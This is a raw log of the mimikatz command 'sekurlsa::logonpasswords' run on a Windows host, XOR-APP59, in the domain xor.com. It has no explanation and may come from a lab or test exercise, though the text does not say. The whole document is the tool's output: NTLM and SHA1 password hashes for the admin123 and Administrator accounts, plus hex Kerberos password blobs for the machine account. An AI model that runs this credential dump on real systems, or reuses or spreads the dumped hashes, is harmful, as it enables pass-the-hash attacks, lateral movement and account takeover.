mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 531786 (00000000:00081d4a)
Session           : RemoteInteractive from 2
User Name         : admin123
Domain            : XOR-APP59
Logon Server      : XOR-APP59
Logon Time        : 1/15/2021 6:49:27 AM
SID               : S-1-5-21-3051798232-4248191986-2095020414-1000
        msv :
         [00000003] Primary
         * Username : admin123
         * Domain   : XOR-APP59
         * NTLM     : 3008c87294511142799dca1191e69a0f
         * SHA1     : b7bc3a1b04d9e165c6762b0a1cde5226df5b6a6a
        tspkg :
        wdigest :
         * Username : admin123
         * Domain   : XOR-APP59
         * Password : (null)
        kerberos :
         * Username : admin123
         * Domain   : XOR-APP59
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 512032 (00000000:0007d020)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/15/2021 6:48:36 AM
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 388a10b5133ba3c95b0af1e355e4df44
         * SHA1     : a39b947daf7e3e7fce32c02bce3d7d00b748e9c1
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP59$
         * Domain   : xor.com
         * Password : 5d 14 d1 50 c9 5d d4 bd 71 d8 e9 13 d9 47 5a e3 02 cb 80 74 41 c2 6c 39 4f 01 7a 5a e1 43 67 16 2c 71 a5 d9 52 8f af 24 70 f4 f7 6f 7c d4 dc 7f d6 25 1c 5c 78 2c 55 2e 22 e7 e3 88 a5 7a 58 09 5a 01 ce ff 1c 9a e2 9a 4d 3e f3 91 20 f5 7c 63 03 b6 af 25 3e 94 b2 94 38 ea a0 a3 de d1 a2 85 bb 36 02 62 4c b1 f6 4c 85 88 32 8f ab 04 ca f1 fb 9f 86 ba fa d2 da 07 a4 76 de 1c e1 f0 3d a3 f2 17 b3 cc ec d5 67 39 e0 b9 d2 ca 56 54 1b fa c4 23 97 97 cf 2a d6 93 11 88 22 c7 6c 8a 97 3c 46 89 8a 57 98 70 02 5b 28 f8 dd fe 36 fe de 37 b5 d7 8e 53 c0 b5 44 35 61 f9 94 8a b0 0c a2 0b 5c 36 32 60 7c 01 5a 03 a0 13 fb 54 96 d9 ca 72 c9 f1 b4 3e e3 c6 59 c6 d9 7e 9e fc 24 1a 7a dc 2a c3 4e 10 52 b6 58 08 79 35 14 68 a9 d6 95 fc
        ssp :
        credman :

Authentication Id : 0 ; 61354 (00000000:0000efaa)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/27/2020 2:07:49 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 7c13687d23a3a88e57fc9ef8bb4cdf2f
         * SHA1     : 6c7ca462ec6e5895b79d6ebf70c202c1d15e49f0
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP59$
         * Domain   : xor.com
         * Password : 2c 7b b3 6e 01 67 62 86 dd e4 91 98 b9 c6 b1 06 16 cd ad c8 d9 f2 84 02 3b db 17 66 98 73 8c a0 c1 81 f5 ec 59 7c e4 94 70 74 ff c8 79 a3 67 52 4e c2 0c dc b1 42 ba 2f 97 93 17 a7 4b 10 35 a3 97 cd d7 b1 bc 48 3f 4a 79 73 4e 90 3a 02 1c 21 2f 06 a2 79 39 36 02 42 65 9e f3 48 df e9 c9 7a 35 3d 9a 0e 87 88 6f dd b6 c3 25 b6 ee 5f 38 cf f0 2f 8e 80 8e fb 12 32 c7 76 4e a4 ff 5c cc ec 74 27 64 34 c5 5f da ca 29 f0 60 15 fa 66 a2 72 0b ee 3f 6e 9e 98 7d 71 80 58 78 dd a7 f2 c9 b0 d9 0d 8e 3f c1 38 56 91 cf 57 7b c8 be f9 43 cf 41 ed 4d 16 1c 47 86 3e ee 1d 16 a4 4c 0d 28 a3 71 2f 04 ae 9d 4d 4a 42 5c 3b aa f7 5a 68 52 d4 3d 56 c9 d9 56 d0 83 e2 f0 17 3b 57 4d 85 1c b8 6a 1b 1f 30 15 d7 e5 34 8c 97 41 33 8f cd d7 85
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XOR-APP59$
Domain            : xor
Logon Server      : (null)
Logon Time        : 11/27/2020 2:07:48 AM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 388a10b5133ba3c95b0af1e355e4df44
         * SHA1     : a39b947daf7e3e7fce32c02bce3d7d00b748e9c1
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : xor-app59$
         * Domain   : XOR.COM
         * Password : 5d 14 d1 50 c9 5d d4 bd 71 d8 e9 13 d9 47 5a e3 02 cb 80 74 41 c2 6c 39 4f 01 7a 5a e1 43 67 16 2c 71 a5 d9 52 8f af 24 70 f4 f7 6f 7c d4 dc 7f d6 25 1c 5c 78 2c 55 2e 22 e7 e3 88 a5 7a 58 09 5a 01 ce ff 1c 9a e2 9a 4d 3e f3 91 20 f5 7c 63 03 b6 af 25 3e 94 b2 94 38 ea a0 a3 de d1 a2 85 bb 36 02 62 4c b1 f6 4c 85 88 32 8f ab 04 ca f1 fb 9f 86 ba fa d2 da 07 a4 76 de 1c e1 f0 3d a3 f2 17 b3 cc ec d5 67 39 e0 b9 d2 ca 56 54 1b fa c4 23 97 97 cf 2a d6 93 11 88 22 c7 6c 8a 97 3c 46 89 8a 57 98 70 02 5b 28 f8 dd fe 36 fe de 37 b5 d7 8e 53 c0 b5 44 35 61 f9 94 8a b0 0c a2 0b 5c 36 32 60 7c 01 5a 03 a0 13 fb 54 96 d9 ca 72 c9 f1 b4 3e e3 c6 59 c6 d9 7e 9e fc 24 1a 7a dc 2a c3 4e 10 52 b6 58 08 79 35 14 68 a9 d6 95 fc
        ssp :
        credman :

Authentication Id : 0 ; 531751 (00000000:00081d27)
Session           : RemoteInteractive from 2
User Name         : admin123
Domain            : XOR-APP59
Logon Server      : XOR-APP59
Logon Time        : 1/15/2021 6:49:27 AM
SID               : S-1-5-21-3051798232-4248191986-2095020414-1000
        msv :
         [00000003] Primary
         * Username : admin123
         * Domain   : XOR-APP59
         * NTLM     : 3008c87294511142799dca1191e69a0f
         * SHA1     : b7bc3a1b04d9e165c6762b0a1cde5226df5b6a6a
        tspkg :
        wdigest :
         * Username : admin123
         * Domain   : XOR-APP59
         * Password : (null)
        kerberos :
         * Username : admin123
         * Domain   : XOR-APP59
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 522421 (00000000:0007f8b5)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/15/2021 6:48:36 AM
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 7c13687d23a3a88e57fc9ef8bb4cdf2f
         * SHA1     : 6c7ca462ec6e5895b79d6ebf70c202c1d15e49f0
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP59$
         * Domain   : xor.com
         * Password : 2c 7b b3 6e 01 67 62 86 dd e4 91 98 b9 c6 b1 06 16 cd ad c8 d9 f2 84 02 3b db 17 66 98 73 8c a0 c1 81 f5 ec 59 7c e4 94 70 74 ff c8 79 a3 67 52 4e c2 0c dc b1 42 ba 2f 97 93 17 a7 4b 10 35 a3 97 cd d7 b1 bc 48 3f 4a 79 73 4e 90 3a 02 1c 21 2f 06 a2 79 39 36 02 42 65 9e f3 48 df e9 c9 7a 35 3d 9a 0e 87 88 6f dd b6 c3 25 b6 ee 5f 38 cf f0 2f 8e 80 8e fb 12 32 c7 76 4e a4 ff 5c cc ec 74 27 64 34 c5 5f da ca 29 f0 60 15 fa 66 a2 72 0b ee 3f 6e 9e 98 7d 71 80 58 78 dd a7 f2 c9 b0 d9 0d 8e 3f c1 38 56 91 cf 57 7b c8 be f9 43 cf 41 ed 4d 16 1c 47 86 3e ee 1d 16 a4 4c 0d 28 a3 71 2f 04 ae 9d 4d 4a 42 5c 3b aa f7 5a 68 52 d4 3d 56 c9 d9 56 d0 83 e2 f0 17 3b 57 4d 85 1c b8 6a 1b 1f 30 15 d7 e5 34 8c 97 41 33 8f cd d7 85
        ssp :
        credman :

Authentication Id : 0 ; 399755 (00000000:0006198b)
Session           : Interactive from 0
User Name         : Administrator
Domain            : XOR-APP59
Logon Server      : XOR-APP59
Logon Time        : 1/15/2021 6:42:26 AM
SID               : S-1-5-21-3051798232-4248191986-2095020414-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : XOR-APP59
         * NTLM     : 3fee04b01f59a1001a366a7681e95699
         * SHA1     : 3a8679fbfdfea03f2d3b5a1a1aa185cca912014b
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : XOR-APP59
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : XOR-APP59
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 281569 (00000000:00044be1)
Session           : Interactive from 0
User Name         : Administrator
Domain            : XOR-APP59
Logon Server      : XOR-APP59
Logon Time        : 11/27/2020 2:12:17 AM
SID               : S-1-5-21-3051798232-4248191986-2095020414-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : XOR-APP59
         * NTLM     : 3fee04b01f59a1001a366a7681e95699
         * SHA1     : 3a8679fbfdfea03f2d3b5a1a1aa185cca912014b
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : XOR-APP59
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : XOR-APP59
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/27/2020 2:07:49 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 61335 (00000000:0000ef97)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/27/2020 2:07:49 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 388a10b5133ba3c95b0af1e355e4df44
         * SHA1     : a39b947daf7e3e7fce32c02bce3d7d00b748e9c1
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP59$
         * Domain   : xor.com
         * Password : 5d 14 d1 50 c9 5d d4 bd 71 d8 e9 13 d9 47 5a e3 02 cb 80 74 41 c2 6c 39 4f 01 7a 5a e1 43 67 16 2c 71 a5 d9 52 8f af 24 70 f4 f7 6f 7c d4 dc 7f d6 25 1c 5c 78 2c 55 2e 22 e7 e3 88 a5 7a 58 09 5a 01 ce ff 1c 9a e2 9a 4d 3e f3 91 20 f5 7c 63 03 b6 af 25 3e 94 b2 94 38 ea a0 a3 de d1 a2 85 bb 36 02 62 4c b1 f6 4c 85 88 32 8f ab 04 ca f1 fb 9f 86 ba fa d2 da 07 a4 76 de 1c e1 f0 3d a3 f2 17 b3 cc ec d5 67 39 e0 b9 d2 ca 56 54 1b fa c4 23 97 97 cf 2a d6 93 11 88 22 c7 6c 8a 97 3c 46 89 8a 57 98 70 02 5b 28 f8 dd fe 36 fe de 37 b5 d7 8e 53 c0 b5 44 35 61 f9 94 8a b0 0c a2 0b 5c 36 32 60 7c 01 5a 03 a0 13 fb 54 96 d9 ca 72 c9 f1 b4 3e e3 c6 59 c6 d9 7e 9e fc 24 1a 7a dc 2a c3 4e 10 52 b6 58 08 79 35 14 68 a9 d6 95 fc
        ssp :
        credman :

Authentication Id : 0 ; 32731 (00000000:00007fdb)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 11/27/2020 2:07:48 AM
SID               :
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 388a10b5133ba3c95b0af1e355e4df44
         * SHA1     : a39b947daf7e3e7fce32c02bce3d7d00b748e9c1
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XOR-APP59$
Domain            : xor
Logon Server      : (null)
Logon Time        : 11/27/2020 2:07:48 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : xor-app59$
         * Domain   : XOR.COM
         * Password : 5d 14 d1 50 c9 5d d4 bd 71 d8 e9 13 d9 47 5a e3 02 cb 80 74 41 c2 6c 39 4f 01 7a 5a e1 43 67 16 2c 71 a5 d9 52 8f af 24 70 f4 f7 6f 7c d4 dc 7f d6 25 1c 5c 78 2c 55 2e 22 e7 e3 88 a5 7a 58 09 5a 01 ce ff 1c 9a e2 9a 4d 3e f3 91 20 f5 7c 63 03 b6 af 25 3e 94 b2 94 38 ea a0 a3 de d1 a2 85 bb 36 02 62 4c b1 f6 4c 85 88 32 8f ab 04 ca f1 fb 9f 86 ba fa d2 da 07 a4 76 de 1c e1 f0 3d a3 f2 17 b3 cc ec d5 67 39 e0 b9 d2 ca 56 54 1b fa c4 23 97 97 cf 2a d6 93 11 88 22 c7 6c 8a 97 3c 46 89 8a 57 98 70 02 5b 28 f8 dd fe 36 fe de 37 b5 d7 8e 53 c0 b5 44 35 61 f9 94 8a b0 0c a2 0b 5c 36 32 60 7c 01 5a 03 a0 13 fb 54 96 d9 ca 72 c9 f1 b4 3e e3 c6 59 c6 d9 7e 9e fc 24 1a 7a dc 2a c3 4e 10 52 b6 58 08 79 35 14 68 a9 d6 95 fc
        ssp :
        credman :
